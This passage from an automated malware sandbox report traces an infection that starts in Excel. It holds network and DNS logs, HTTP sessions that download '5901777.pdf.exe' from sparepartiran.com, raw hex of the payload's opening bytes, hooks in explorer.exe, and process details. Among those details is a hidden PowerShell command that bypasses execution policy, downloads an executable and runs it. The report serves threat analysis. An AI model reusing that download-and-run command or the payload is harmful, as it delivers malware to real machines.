                                              Nov 27, 2020 11:38:08.959908009 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.959959030 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.959990978 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.960108042 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.016362906 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.019684076 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.019738913 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.019777060 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.019817114 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.019829988 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.019855976 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.019896030 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.019921064 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.020001888 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.020236015 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.020278931 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.020317078 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.020349979 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.020354986 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.021069050 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.064140081 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.079015970 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.079062939 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.079102993 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.079142094 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.079160929 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.079231977 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.081520081 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.081563950 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.081604004 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.081624985 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.081645966 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.081757069 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.084659100 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.084716082 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.084754944 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.084791899 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.084820032 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.084831953 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.084836006 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.084872007 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.084919930 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.084923029 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.084963083 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.085015059 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.087742090 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.087779045 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.087816954 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.087855101 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.087865114 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.088689089 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.137701035 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137737989 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137759924 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137780905 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137788057 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.137809038 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137818098 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.137830019 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137851000 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137851954 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.137871981 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137881994 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.137900114 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.138164997 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.138186932 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.138206959 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.138211966 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.138227940 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.138241053 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.138268948 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.138952017 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.138974905 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.138994932 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.138998032 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.139018059 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.139019966 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.139033079 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.139053106 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.139137983 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.139163971 CET8049744162.223.88.131192.168.2.3

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 27, 2020 11:36:28.906232119 CET5836153192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:28.933271885 CET53583618.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:29.570267916 CET6349253192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:29.611063004 CET53634928.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:38.939960003 CET6083153192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:38.967020035 CET53608318.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:39.954265118 CET6010053192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:39.996702909 CET53601008.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:40.132668018 CET5319553192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:40.159857035 CET53531958.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:40.329982042 CET5014153192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:40.378119946 CET53501418.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:41.359257936 CET5014153192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:41.399657011 CET53501418.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:42.045535088 CET5302353192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:42.072751999 CET53530238.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:42.358972073 CET5014153192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:42.399580002 CET53501418.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:42.721008062 CET4956353192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:42.748132944 CET53495638.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:43.439760923 CET5135253192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:43.475255013 CET53513528.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:44.374624014 CET5014153192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:44.410218000 CET53501418.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:48.390551090 CET5014153192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:48.426340103 CET53501418.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:52.144023895 CET5934953192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:52.179600000 CET53593498.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:53.220006943 CET5708453192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:53.247128010 CET53570848.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:53.946345091 CET5882353192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:53.973597050 CET53588238.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:54.777817965 CET5756853192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:54.804825068 CET53575688.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:55.010998964 CET5054053192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:55.037981987 CET53505408.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:55.484256983 CET5436653192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:55.511518955 CET53543668.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:56.209888935 CET5303453192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:56.250344992 CET53530348.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:57.942320108 CET5776253192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:57.969628096 CET53577628.8.8.8192.168.2.3
                                              Nov 27, 2020 11:36:58.576900005 CET5543553192.168.2.38.8.8.8
                                              Nov 27, 2020 11:36:58.604027033 CET53554358.8.8.8192.168.2.3
                                              Nov 27, 2020 11:37:01.721138000 CET5071353192.168.2.38.8.8.8
                                              Nov 27, 2020 11:37:01.760047913 CET53507138.8.8.8192.168.2.3
                                              Nov 27, 2020 11:37:10.614938974 CET5613253192.168.2.38.8.8.8
                                              Nov 27, 2020 11:37:10.658346891 CET53561328.8.8.8192.168.2.3
                                              Nov 27, 2020 11:37:18.635252953 CET5898753192.168.2.38.8.8.8
                                              Nov 27, 2020 11:37:18.677719116 CET53589878.8.8.8192.168.2.3
                                              Nov 27, 2020 11:37:29.832556963 CET5657953192.168.2.38.8.8.8
                                              Nov 27, 2020 11:37:29.859958887 CET53565798.8.8.8192.168.2.3
                                              Nov 27, 2020 11:37:33.467720985 CET6063353192.168.2.38.8.8.8
                                              Nov 27, 2020 11:37:33.505007029 CET53606338.8.8.8192.168.2.3
                                              Nov 27, 2020 11:38:05.516347885 CET6129253192.168.2.38.8.8.8
                                              Nov 27, 2020 11:38:05.543705940 CET53612928.8.8.8192.168.2.3
                                              Nov 27, 2020 11:38:08.529928923 CET6361953192.168.2.38.8.8.8
                                              Nov 27, 2020 11:38:08.616806984 CET6493853192.168.2.38.8.8.8
                                              Nov 27, 2020 11:38:08.674444914 CET53636198.8.8.8192.168.2.3
                                              Nov 27, 2020 11:38:08.763250113 CET53649388.8.8.8192.168.2.3
                                              Nov 27, 2020 11:38:11.222491980 CET6194653192.168.2.38.8.8.8
                                              Nov 27, 2020 11:38:11.266062975 CET53619468.8.8.8192.168.2.3

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Nov 27, 2020 11:38:08.529928923 CET192.168.2.38.8.8.80x7f0Standard query (0)sparepartiran.comA (IP address)IN (0x0001)
                                              Nov 27, 2020 11:38:08.616806984 CET192.168.2.38.8.8.80x37a5Standard query (0)sparepartiran.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Nov 27, 2020 11:38:08.674444914 CET8.8.8.8192.168.2.30x7f0No error (0)sparepartiran.com162.223.88.131A (IP address)IN (0x0001)
                                              Nov 27, 2020 11:38:08.763250113 CET8.8.8.8192.168.2.30x37a5No error (0)sparepartiran.com162.223.88.131A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • sparepartiran.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.349743162.223.88.13180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 27, 2020 11:38:08.837831020 CET4976OUTGET /js/2Q/5901777.pdf.exe HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                              Host: sparepartiran.com
                                              Connection: Keep-Alive
                                              Nov 27, 2020 11:38:08.958857059 CET4978INHTTP/1.1 200 OK
                                              Date: Fri, 27 Nov 2020 10:38:08 GMT
                                              Server: Apache
                                              Last-Modified: Fri, 27 Nov 2020 09:07:10 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 552960
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b be c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 50 04 00 00 1e 04 00 00 00 00 00 4e 6f 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 6e 04 00 57 00 00 00 00 80 04 00 d8 1b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 4f 04 00 00 20 00 00 00 50 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 1b 04 00 00 80 04 00 00 1c 04 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 6f 04 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 4a 04 00 68 24 00 00 03 00 00 00 15 00 00 06 a0 30 00 00 ec 19 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 15 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 33 00 00 00 00 00 00 00 02 28 14 00 00 0a 02 1d 2d 13 26 02 19 2d 15 26 02 15 2d 17 26 02 28 05 00 00 06 2b 15 28 03 00 00 06 2b e7 28 04 00 00 06 2b e5 28 07 00 00 06 2b e3 2a 00 13 30 07 00 8a 00 00 00 01 00 00 11 20 d9 03 00 00 1c 2d 1b 26 73 15 00 00 0a 1a 2d 15 26 73 58 00 00 06 1b 2d 0f 26 06 6f 16 00 00 0a 2b 10 0d 2b e3 0a 2b e9 13 04 2b ee 17 28 17 00 00 0a 06 6f 18 00 00 0a 09 6a 32 f0 02 d0 2b 00 00 01 28 19 00 00 0a 72 01 00 00 70 17 8d 48 00 00 01 0b 07 16 d0 01 00 00 1b 28 19 00 00 0a a2 07 28 1a 00 00 0a 14 17 8d 2a 00 00 01 0c 08 16 11 04 6f 5b 00 00 06 a2 08 6f 1b 00 00 0a 74 2b 00 00 01 7d 01 00 00 04 2a 00 00 03 30 09 00 20 00 00 00 00 00 00 00 02 02 7b 01 00 00 04 72 0b 00 00 70 6f 1c 00 00 0a 1d 2d 04 26 26 2b 07 7d 02 00 00 04 2b 00 2a 13 30 09 00 75 00 00 00 02 00 00 11 02 7b 02 00 00 04 28 1d 00 00 0a 19 2d 0a 26 7e 04 00 00 04 2d 49 2b 03 0a 2b f4 20 00 01 00 00 72 5f 00 00 70 14 d0 06 00 00 02 28 19 00 00 0a 17 8d 02 00 00 01 18 2d 1c 26 07 16 16 14 28 1e 00 00 0a a2 07 28 1f 00 00 0a 28 20 00 00 0a 15 2d 06 26 2b 0a 0b 2b e2 80 04 00 00 04 2b 00 7e 04 00 00 04 7b 21 00 00 0a 7e 04 00 00 04 06 6f 22 00 00 0a 2a 00 00 00 03 30 09 00 27 00 00 00 00 00 00 00 03 2c 13 02 7b 03 00 00 04 2c 0b 02 7b 03 00 00 04 6f 23 00 00 0a 02 03 17 2d 04 26 26 2b 07 28 24 00 00 0a 2b 00 2a 00 03 30 09 00 4a 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_PNo @ @nW H.textTO P `.rsrcR@@.relocn@B0oHJh$00-&(+&+*03(-&-&-&(+(+(+(+*0 -&s-&sX-&o++++(oj2+(rpH((*o[ot+}*0 {rpo-&&+}+*0u{(-&~-I++ r_p(-&((( -&+++~{!~o"*0',{,{o#-&&+($+*0J


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.349744162.223.88.13180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 27, 2020 11:38:08.898339987 CET4976OUTGET /js/2Q/5901777.pdf.exe HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                              Host: sparepartiran.com
                                              Connection: Keep-Alive
                                              Nov 27, 2020 11:38:09.019684076 CET4992INHTTP/1.1 200 OK
                                              Date: Fri, 27 Nov 2020 10:38:08 GMT
                                              Server: Apache
                                              Last-Modified: Fri, 27 Nov 2020 09:07:10 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 552960
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b be c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 50 04 00 00 1e 04 00 00 00 00 00 4e 6f 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 6e 04 00 57 00 00 00 00 80 04 00 d8 1b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 4f 04 00 00 20 00 00 00 50 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 1b 04 00 00 80 04 00 00 1c 04 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 6f 04 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 4a 04 00 68 24 00 00 03 00 00 00 15 00 00 06 a0 30 00 00 ec 19 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 15 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 33 00 00 00 00 00 00 00 02 28 14 00 00 0a 02 1d 2d 13 26 02 19 2d 15 26 02 15 2d 17 26 02 28 05 00 00 06 2b 15 28 03 00 00 06 2b e7 28 04 00 00 06 2b e5 28 07 00 00 06 2b e3 2a 00 13 30 07 00 8a 00 00 00 01 00 00 11 20 d9 03 00 00 1c 2d 1b 26 73 15 00 00 0a 1a 2d 15 26 73 58 00 00 06 1b 2d 0f 26 06 6f 16 00 00 0a 2b 10 0d 2b e3 0a 2b e9 13 04 2b ee 17 28 17 00 00 0a 06 6f 18 00 00 0a 09 6a 32 f0 02 d0 2b 00 00 01 28 19 00 00 0a 72 01 00 00 70 17 8d 48 00 00 01 0b 07 16 d0 01 00 00 1b 28 19 00 00 0a a2 07 28 1a 00 00 0a 14 17 8d 2a 00 00 01 0c 08 16 11 04 6f 5b 00 00 06 a2 08 6f 1b 00 00 0a 74 2b 00 00 01 7d 01 00 00 04 2a 00 00 03 30 09 00 20 00 00 00 00 00 00 00 02 02 7b 01 00 00 04 72 0b 00 00 70 6f 1c 00 00 0a 1d 2d 04 26 26 2b 07 7d 02 00 00 04 2b 00 2a 13 30 09 00 75 00 00 00 02 00 00 11 02 7b 02 00 00 04 28 1d 00 00 0a 19 2d 0a 26 7e 04 00 00 04 2d 49 2b 03 0a 2b f4 20 00 01 00 00 72 5f 00 00 70 14 d0 06 00 00 02 28 19 00 00 0a 17 8d 02 00 00 01 18 2d 1c 26 07 16 16 14 28 1e 00 00 0a a2 07 28 1f 00 00 0a 28 20 00 00 0a 15 2d 06 26 2b 0a 0b 2b e2 80 04 00 00 04 2b 00 7e 04 00 00 04 7b 21 00 00 0a 7e 04 00 00 04 06 6f 22 00 00 0a 2a 00 00 00 03 30 09 00 27 00 00 00 00 00 00 00 03 2c 13 02 7b 03 00 00 04 2c 0b 02 7b 03 00 00 04 6f 23 00 00 0a 02 03 17 2d 04 26 26 2b 07 28 24 00 00 0a 2b 00 2a 00 03 30 09 00 4a 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_PNo @ @nW H.textTO P `.rsrcR@@.relocn@B0oHJh$00-&(+&+*03(-&-&-&(+(+(+(+*0 -&s-&sX-&o++++(oj2+(rpH((*o[ot+}*0 {rpo-&&+}+*0u{(-&~-I++ r_p(-&((( -&+++~{!~o"*0',{,{o#-&&+($+*0J


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE0
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE0
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE0
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE0

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: EXCEL.EXE PID: 5988 Parent PID: 792

                                              General

                                              Start time:11:36:38
                                              Start date:27/11/2020
                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x12f0000
                                              File size:27110184 bytes
                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: splwow64.exe PID: 3636 Parent PID: 5988

                                              General

                                              Start time:11:38:01
                                              Start date:27/11/2020
                                              Path:C:\Windows\splwow64.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\splwow64.exe 12288
                                              Imagebase:0x7ff704f00000
                                              File size:130560 bytes
                                              MD5 hash:8D59B31FF375059E3C32B17BF31A76D5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: powershell.exe PID: 5164 Parent PID: 4940

                                              General

                                              Start time:11:38:04
                                              Start date:27/11/2020
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
                                              Imagebase:0x7ff785e30000
                                              File size:447488 bytes
                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:high

                                              Analysis Process: powershell.exe PID: 5184 Parent PID: 4940

                                              General

                                              Start time:11:38:04
                                              Start date:27/11/2020
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
                                              Imagebase:0x7ff785e30000
                                              File size:447488 bytes
                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:high

                                              Analysis Process: conhost.exe PID: 5268 Parent PID: 5164

                                              General

                                              Start time:11:38:04
                                              Start date:27/11/2020
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6b2800000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: conhost.exe PID: 5280 Parent PID: 5184

                                              General

                                              Start time:11:38:05
                                              Start date:27/11/2020
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6b2800000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: oftmhayq.exe PID: 5540 Parent PID: 5164

                                              General

                                              Start time:11:38:09
                                              Start date:27/11/2020
                                              Path:C:\Users\Public\oftmhayq.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\oftmhayq.exe'
                                              Imagebase:0x7c0000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
